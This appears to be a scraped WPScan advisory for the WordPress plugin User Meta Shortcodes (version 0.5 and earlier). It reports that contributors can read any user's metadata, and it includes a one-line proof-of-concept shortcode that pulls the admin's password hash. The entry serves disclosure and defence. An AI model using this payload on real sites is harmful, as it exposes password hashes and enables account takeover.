Lucene search

K
wpvulndbFrancesco CarlucciWPVDB-ID:958F44A5-07E7-4349-9212-2A039A082BA0
HistoryNov 15, 2021 - 12:00 a.m.

User Meta Shortcodes <= 0.5 - Contributor+ Unauthorized Arbitrary User Metadata Access

2021-11-1500:00:00
Francesco Carlucci
wpscan.com
8

0.001 Low

EPSS

Percentile

24.8%

The plugin registers a shortcode that allows any user with a role as low as contributor to access other users metadata by specifying the user login as a parameter. This makes the WP instance vulnerable to data extrafiltration, including password hashes

PoC

As a contributor, put the following shortcode in a post/page [otheruserinfo login=“admin” field=“user_pass”][/otheruserinfo]

CPENameOperatorVersion
user-meta-shortcodeseq*

0.001 Low

EPSS

Percentile

24.8%

Related for WPVDB-ID:958F44A5-07E7-4349-9212-2A039A082BA0